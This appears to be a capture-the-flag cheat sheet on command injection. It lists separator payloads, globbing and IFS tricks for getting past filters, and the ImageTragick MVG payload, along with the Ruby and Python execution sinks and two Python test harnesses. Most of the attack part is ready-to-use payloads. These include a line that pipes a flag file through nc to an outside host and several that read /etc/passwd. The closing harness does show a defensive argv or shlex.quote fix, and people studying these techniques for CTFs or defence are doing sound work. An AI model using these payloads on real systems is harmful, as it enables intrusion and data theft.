Command Injection

| cat flag
&& cat flag
; cat flag
%0a cat flag        (%0a is a URL-encoded newline, which terminates the previous command like ;)
"; cat flag         (closes a double-quoted argument first, then starts a new command)
`cat flag`
cat $(ls)
"; cat $(ls)
`cat flag | nc kaibro.tw 5278`   (exfiltrate the output to a listener when the response is not shown)

. flag              (sourcing the file makes the shell report each line as an unknown command, so the contents leak through the error message)
PS1=$(cat flag)     (in an interactive shell the file contents become the prompt)

Globbing: ? and *

  • ? matches exactly one character
    • cat fl?g
    • /???/??t /???/p??s??   (expands to /bin/cat /etc/passwd; the shell substitutes every matching path, so check what else the pattern matches)
  • * matches any number of characters, including none
    • cat f*
    • cat f?a*

Whitespace bypass

  • ${IFS}   (the internal field separator, space/tab/newline by default; the shell splits words on it after expansion)
    • cat${IFS}flag
    • ls$IFS-alh
    • cat$IFS$2flag   ($2 is an unset positional parameter that expands to nothing; it only ends the variable name so the shell does not look for $IFSflag)
  • cat</etc/passwd   (a redirection needs no space at all)
  • {cat,/etc/passwd}   (brace expansion, bash only)
  • X=$'cat\x20/etc/passwd'&&$X   ($'...' quoting turns \x20 into a space, bash only; the unquoted $X is word-split on execution)
  • IFS=,;`cat<<<uname,-a`
    • bash only (here-string); the comma is now the separator, so the substituted uname,-a splits into uname -a

Keyword bypass

  • String Concat
    • A=fl;B=ag;cat $A$B
  • Empty Variable
    • cat fl${x}ag   (an unset variable expands to nothing)
    • cat tes$(z)t/flag   ($(z) runs a nonexistent command and substitutes its empty output)
  • Environment Variable
    • $PATH => "/usr/local/…"   (slice a variable with a known value to obtain filtered characters)
      • ${PATH:0:1} => '/'
      • ${PATH:1:1} => 'u'
      • ${PATH:0:4} => '/usr'
  • Empty String
    • cat fl""ag
    • cat fl''ag
    • cat "fl""ag"
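The whitespace and keyword tricks above are easiest to trust once you have run them against a filter. The harness below is an added example, not code from the original notes: it creates a constructed flag file in a temporary directory, defines a hypothetical naive_filter that rejects a literal space or the word "flag", and runs one payload per technique under bash (assumed to be installed, and PATH is assumed to start with "/") to confirm that each payload both slips past the filter and still reads the file.

```python
import os
import subprocess
import tempfile

# Constructed sample target: a file named "flag" with known content, created in a
# temporary directory so the harness runs offline and cleans up after itself.
FLAG_CONTENT = "FLAG{constructed-sample}"


def naive_filter(payload: str) -> bool:
    """Hypothetical blacklist of the kind these tricks defeat: it rejects any
    payload containing a literal space or the substring "flag"."""
    return " " in payload or "flag" in payload


# Each payload reads ./flag without containing a space or the word "flag".
# They rely on bash-only features (${IFS} splitting, brace expansion, $'...'
# quoting, ${PATH:0:1} slicing), so they are executed under bash explicitly.
PAYLOADS = {
    "ifs_empty_var":   "cat${IFS}fl${x}ag",            # ${IFS} -> whitespace, ${x} unset -> ""
    "ifs_positional":  "cat$IFS$2fl''ag",              # $2 is empty; it only ends the name IFS
    "redirect":        'cat<fl""ag',                   # < needs no space at all
    "brace_expansion": "{cat,fl${x}ag}",               # expands to: cat flag
    "ansi_c_quoting":  "X=$'cat\\x20fl'\"ag\"&&$X",    # \x20 is a space; unquoted $X is word-split
    "string_concat":   "A=fl;B=ag;cat${IFS}$A$B",      # keyword assembled from variables
    "path_slice_glob": "cat${IFS}.${PATH:0:1}f?a*",    # ${PATH:0:1} is "/" (PATH assumed to start with /)
}


def run_payload(payload: str, cwd: str) -> str:
    """Run one payload under bash inside cwd and return its stdout, stripped."""
    env = dict(os.environ)
    env.pop("x", None)  # make sure the "empty variable" trick really sees an unset ${x}
    proc = subprocess.run(["bash", "-c", payload], cwd=cwd, env=env,
                          capture_output=True, text=True, timeout=10)
    return proc.stdout.strip()


def check_bypasses() -> dict:
    """For every payload return (survives_filter, read_the_flag)."""
    with tempfile.TemporaryDirectory() as workdir:
        with open(os.path.join(workdir, "flag"), "w") as fh:
            fh.write(FLAG_CONTENT + "\n")
        results = {}
        for name, payload in PAYLOADS.items():
            survives = not naive_filter(payload)
            got_flag = run_payload(payload, workdir) == FLAG_CONTENT
            results[name] = (survives, got_flag)
        return results


if __name__ == "__main__":
    print("plain 'cat flag' blocked:", naive_filter("cat flag"))
    for name, (survives, got_flag) in check_bypasses().items():
        print(f"{name:16} survives_filter={survives} read_flag={got_flag}")
```

Every entry should report survives_filter=True and read_flag=True while the plain "cat flag" is blocked; swap in the real filter you are up against to see which payloads survive it.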

ImageMagick (ImageTragick)

  • CVE-2016-3714
  • The MVG format accepts https:// URLs, which ImageMagick fetches through its curl delegate; the URL is spliced into the delegate's shell command inside double quotes, so a " in the URL closes the string and the remainder runs as a command
  • payload:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://kaibro.tw";ls "-la)'
pop graphic-context

Ruby Command Execution

  • open("| ls")   (Kernel#open treats a leading | as a command to spawn, not a filename)
  • IO.popen("ls").read
  • Kernel.exec("ls")
  • `ls`
  • system("ls")
  • eval("ruby code")
    • Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
      • $$/$$ => 1   ($$ is the current PID, so dividing it by itself gives 1)
      • '' << 97 << 98 << 99 => "abc"   (String#<< with an Integer appends the character with that codepoint)
      • $: is an alias for $LOAD_PATH
  • exec("ls")
  • %x{ls}
  • Net::FTP
    • CVE-2017-17405
    • Net::FTP#get/#put opened the local file with Kernel#open, so a local filename beginning with | spawned a command; fixed by switching to File.open

Python Command Execution

  • os.system("ls")
  • os.popen("ls").read()
  • os.execl("/bin/ls","")
  • os.execlp("ls","")
  • os.execv("/bin/ls",[''])
  • os.execvp("/bin/ls",[""])
  • subprocess.call("ls")
    • subprocess.call("ls|cat",shell=False) => Fail (the whole string is looked up as one program name, so no shell metacharacters apply)
    • subprocess.call("ls|cat",shell=True) => Correct (the string is handed to /bin/sh -c, which is the injection sink)
  • eval("__import__('os').system('ls')")
  • exec("__import__('os').system('ls')")
  • commands.getoutput('ls')   (Python 2 only; the module was removed in Python 3, where subprocess.getoutput('ls') is the equivalent)
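The shell=True versus shell=False distinction above is the whole story of command injection in Python, and it also decides whether the separators listed at the top of this page do anything. The following is an added example, not code from the original notes: a hypothetical line-counting helper written three ways (string through the shell, argv list, and shlex.quote when a shell is unavoidable), probed with one constructed payload per separator. Each payload tries to create a marker file in a temporary directory; the marker's existence afterwards is the proof that the injected command ran. It assumes a POSIX /bin/sh plus wc and touch on the path.

```python
import os
import shlex
import subprocess
import tempfile

# Three versions of the same hypothetical helper: count the lines of a
# user-supplied file.  Only the first hands the untrusted string to /bin/sh.

def count_lines_vulnerable(filename: str) -> subprocess.CompletedProcess:
    """shell=True: the whole string is parsed by /bin/sh -c, metacharacters included."""
    return subprocess.run("wc -l " + filename, shell=True,
                          capture_output=True, text=True)


def count_lines_argv(filename: str) -> subprocess.CompletedProcess:
    """argv list, no shell: filename is a single argument to wc, however odd it looks."""
    return subprocess.run(["wc", "-l", filename],
                          capture_output=True, text=True)


def count_lines_quoted(filename: str) -> subprocess.CompletedProcess:
    """When a shell is unavoidable, shlex.quote() single-quotes the value so
    ; | && newlines $() and backticks stay literal."""
    return subprocess.run("wc -l " + shlex.quote(filename), shell=True,
                          capture_output=True, text=True)


# One constructed injection per separator from the list at the top of the page.
# Each tries to create a marker file; its existence afterwards proves execution.
SEPARATORS = {
    ";":         "/dev/null; touch {marker}",
    "|":         "/dev/null| touch {marker}",
    "&&":        "/dev/null && touch {marker}",
    "newline":   "/dev/null\ntouch {marker}",    # %0a once URL-decoded
    "$()":       "/dev/null$(touch {marker})",   # substitution output is empty, but it ran
    "backticks": "/dev/null`touch {marker}`",
}


def probe(sink) -> dict:
    """Feed every separator payload to a sink; return {separator: command_executed}."""
    with tempfile.TemporaryDirectory() as workdir:
        hits = {}
        for idx, (name, template) in enumerate(SEPARATORS.items()):
            marker = os.path.join(workdir, f"hit{idx}")   # path contains no metacharacters
            sink(template.format(marker=marker))
            hits[name] = os.path.exists(marker)
        return hits


def metachars_without_shell() -> bool:
    """subprocess.call("ls|cat") with shell=False looks for a program literally
    named "ls|cat"; returns True when that lookup fails, as the notes describe."""
    try:
        subprocess.call("ls|cat", shell=False)
    except FileNotFoundError:
        return True
    return False


if __name__ == "__main__":
    print("shell=True  :", probe(count_lines_vulnerable))
    print("argv list   :", probe(count_lines_argv))
    print("shlex.quote :", probe(count_lines_quoted))
    print("'ls|cat' without a shell raises FileNotFoundError:", metachars_without_shell())
```

The shell=True sink reports every separator as executed; the argv and shlex.quote sinks report none, because the payload only ever reaches wc as one argument. Prefer the argv form; shlex.quote is the fallback for the rare case where a shell pipeline is genuinely required.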